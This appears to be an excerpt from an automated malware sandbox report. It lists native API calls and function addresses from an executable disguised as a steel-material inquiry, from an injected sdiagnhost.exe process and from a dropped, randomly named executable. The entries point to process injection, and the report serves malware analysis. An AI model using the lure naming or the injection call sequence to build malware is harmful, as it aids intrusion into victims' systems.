Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2AB0 NtWaitForSingleObject,		0_2_00EE2AB0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2BE0 NtQueryValueKey,		0_2_00EE2BE0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2BF0 NtAllocateVirtualMemory,		0_2_00EE2BF0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2BA0 NtEnumerateValueKey,		0_2_00EE2BA0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2B80 NtQueryInformationFile,		0_2_00EE2B80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2CF0 NtOpenProcess,		0_2_00EE2CF0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2CC0 NtQueryVirtualMemory,		0_2_00EE2CC0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2CA0 NtQueryInformationToken,		0_2_00EE2CA0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2C60 NtCreateKey,		0_2_00EE2C60
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2C00 NtQueryInformationProcess,		0_2_00EE2C00
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2DD0 NtDelayExecution,		0_2_00EE2DD0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2DB0 NtEnumerateKey,		0_2_00EE2DB0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2D30 NtUnmapViewOfSection,		0_2_00EE2D30
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2D00 NtSetInformationFile,		0_2_00EE2D00
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2D10 NtMapViewOfSection,		0_2_00EE2D10
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2EE0 NtQueueApcThread,		0_2_00EE2EE0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2EA0 NtAdjustPrivilegesToken,		0_2_00EE2EA0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2E80 NtReadVirtualMemory,		0_2_00EE2E80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2E30 NtWriteVirtualMemory,		0_2_00EE2E30
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2FE0 NtCreateFile,		0_2_00EE2FE0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2FA0 NtQuerySection,		0_2_00EE2FA0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2FB0 NtResumeThread,		0_2_00EE2FB0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2F90 NtProtectVirtualMemory,		0_2_00EE2F90
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2F60 NtCreateProcessEx,		0_2_00EE2F60
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2F30 NtCreateSection,		0_2_00EE2F30
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE3090 NtSetValueKey,		0_2_00EE3090
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE3010 NtOpenDirectoryObject,		0_2_00EE3010
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE39B0 NtGetContextThread,		0_2_00EE39B0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE3D70 NtOpenThread,		0_2_00EE3D70
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE3D10 NtOpenProcessToken,		0_2_00EE3D10
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF4650 NtSuspendThread,LdrInitializeThunk,		10_2_04CF4650
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF4340 NtSetContextThread,LdrInitializeThunk,		10_2_04CF4340
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2CA0 NtQueryInformationToken,LdrInitializeThunk,		10_2_04CF2CA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2C60 NtCreateKey,LdrInitializeThunk,		10_2_04CF2C60
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2C70 NtFreeVirtualMemory,LdrInitializeThunk,		10_2_04CF2C70
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2DD0 NtDelayExecution,LdrInitializeThunk,		10_2_04CF2DD0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2DF0 NtQuerySystemInformation,LdrInitializeThunk,		10_2_04CF2DF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2D10 NtMapViewOfSection,LdrInitializeThunk,		10_2_04CF2D10
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2D30 NtUnmapViewOfSection,LdrInitializeThunk,		10_2_04CF2D30
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2EE0 NtQueueApcThread,LdrInitializeThunk,		10_2_04CF2EE0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2E80 NtReadVirtualMemory,LdrInitializeThunk,		10_2_04CF2E80
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2FE0 NtCreateFile,LdrInitializeThunk,		10_2_04CF2FE0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2FB0 NtResumeThread,LdrInitializeThunk,		10_2_04CF2FB0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2F30 NtCreateSection,LdrInitializeThunk,		10_2_04CF2F30
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2AD0 NtReadFile,LdrInitializeThunk,		10_2_04CF2AD0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2AF0 NtWriteFile,LdrInitializeThunk,		10_2_04CF2AF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2BE0 NtQueryValueKey,LdrInitializeThunk,		10_2_04CF2BE0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,		10_2_04CF2BF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2BA0 NtEnumerateValueKey,LdrInitializeThunk,		10_2_04CF2BA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2B60 NtClose,LdrInitializeThunk,		10_2_04CF2B60
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF35C0 NtCreateMutant,LdrInitializeThunk,		10_2_04CF35C0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF39B0 NtGetContextThread,LdrInitializeThunk,		10_2_04CF39B0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2CC0 NtQueryVirtualMemory,		10_2_04CF2CC0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2CF0 NtOpenProcess,		10_2_04CF2CF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2C00 NtQueryInformationProcess,		10_2_04CF2C00
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2DB0 NtEnumerateKey,		10_2_04CF2DB0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2D00 NtSetInformationFile,		10_2_04CF2D00
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2EA0 NtAdjustPrivilegesToken,		10_2_04CF2EA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2E30 NtWriteVirtualMemory,		10_2_04CF2E30
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2F90 NtProtectVirtualMemory,		10_2_04CF2F90
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2FA0 NtQuerySection,		10_2_04CF2FA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2F60 NtCreateProcessEx,		10_2_04CF2F60
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2AB0 NtWaitForSingleObject,		10_2_04CF2AB0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF2B80 NtQueryInformationFile,		10_2_04CF2B80
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF3090 NtSetValueKey,		10_2_04CF3090
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF3010 NtOpenDirectoryObject,		10_2_04CF3010
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF3D70 NtOpenThread,		10_2_04CF3D70
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF3D10 NtOpenProcessToken,		10_2_04CF3D10
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CC9A40 NtReadFile,		10_2_02CC9A40
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CC9BD0 NtClose,		10_2_02CC9BD0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CC9B30 NtDeleteFile,		10_2_02CC9B30
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CC98D0 NtCreateFile,		10_2_02CC98D0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CC9D20 NtAllocateVirtualMemory,		10_2_02CC9D20

Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AB8F23		0_2_00AB8F23
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AB08F3		0_2_00AB08F3
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AAE8D3		0_2_00AAE8D3
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AA31B0		0_2_00AA31B0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AB7123		0_2_00AB7123
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AB711F		0_2_00AB711F
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AAEA23		0_2_00AAEA23
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AAEA18		0_2_00AAEA18
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AA24FC		0_2_00AA24FC
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AB06CA		0_2_00AB06CA
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AB06D3		0_2_00AB06D3
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ACF663		0_2_00ACF663
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F42000		0_2_00F42000
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F681CC		0_2_00F681CC
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F641A2		0_2_00F641A2
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F701AA		0_2_00F701AA
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F38158		0_2_00F38158
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA0100		0_2_00EA0100
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4A118		0_2_00F4A118
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F302C0		0_2_00F302C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50274		0_2_00F50274
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F703E6		0_2_00F703E6
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBE3F0		0_2_00EBE3F0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6A352		0_2_00F6A352
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F5E4F6		0_2_00F5E4F6
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F62446		0_2_00F62446
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F54420		0_2_00F54420
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F70591		0_2_00F70591
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0535		0_2_00EB0535
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECC6E0		0_2_00ECC6E0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAC7C0		0_2_00EAC7C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0770		0_2_00EB0770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED4750		0_2_00ED4750
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE8F0		0_2_00EDE8F0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E968B8		0_2_00E968B8
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBA840		0_2_00EBA840
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB2840		0_2_00EB2840
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0		0_2_00EB29A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F7A9A6		0_2_00F7A9A6
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC6962		0_2_00EC6962
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAEA80		0_2_00EAEA80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F66BD7		0_2_00F66BD7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6AB40		0_2_00F6AB40
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA0CF2		0_2_00EA0CF2
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50CB5		0_2_00F50CB5
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0C00		0_2_00EB0C00
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAADE0		0_2_00EAADE0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC8DBF		0_2_00EC8DBF
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBAD00		0_2_00EBAD00
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4CD1F		0_2_00F4CD1F
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6EEDB		0_2_00F6EEDB
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6CE93		0_2_00F6CE93
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC2E90		0_2_00EC2E90
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0E59		0_2_00EB0E59
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6EE26		0_2_00F6EE26
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBCFE0		0_2_00EBCFE0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA2FC8		0_2_00EA2FC8
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2EFA0		0_2_00F2EFA0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F24F40		0_2_00F24F40
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F52F30		0_2_00F52F30
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EF2F28		0_2_00EF2F28
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED0F30		0_2_00ED0F30
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6F0E0		0_2_00F6F0E0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F670E9		0_2_00F670E9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB70C0		0_2_00EB70C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F5F0CC		0_2_00F5F0CC
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBB1B0		0_2_00EBB1B0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE516C		0_2_00EE516C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9F172		0_2_00E9F172
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F7B16B		0_2_00F7B16B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F512ED		0_2_00F512ED
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECB2C0		0_2_00ECB2C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB52A0		0_2_00EB52A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EF739A		0_2_00EF739A
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9D34C		0_2_00E9D34C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6132D		0_2_00F6132D
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA1460		0_2_00EA1460
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6F43F		0_2_00F6F43F
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F795C3		0_2_00F795C3
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4D5B0		0_2_00F4D5B0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F67571		0_2_00F67571
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F616CC		0_2_00F616CC
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EF5630		0_2_00EF5630
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6F7B0		0_2_00F6F7B0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB38E0		0_2_00EB38E0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1D800		0_2_00F1D800
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB9950		0_2_00EB9950
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECB950		0_2_00ECB950
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F45910		0_2_00F45910
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F5DAC6		0_2_00F5DAC6
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EF5AA0		0_2_00EF5AA0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F51AA3		0_2_00F51AA3
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4DAAC		0_2_00F4DAAC
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F23A6C		0_2_00F23A6C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F67A46		0_2_00F67A46
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6FA49		0_2_00F6FA49
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F25BF0		0_2_00F25BF0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EEDBF9		0_2_00EEDBF9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECFB80		0_2_00ECFB80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6FB76		0_2_00F6FB76
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6FCF2		0_2_00F6FCF2
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F29C32		0_2_00F29C32
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECFDC0		0_2_00ECFDC0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F67D73		0_2_00F67D73
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB3D40		0_2_00EB3D40
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F61D5A		0_2_00F61D5A
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB9EB0		0_2_00EB9EB0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E73FD5		0_2_00E73FD5
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E73FD2		0_2_00E73FD2
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6FFB1		0_2_00F6FFB1
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB1F92		0_2_00EB1F92
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6FF09		0_2_00F6FF09
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050E9C4B		9_2_050E9C4B
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050E9C54		9_2_050E9C54
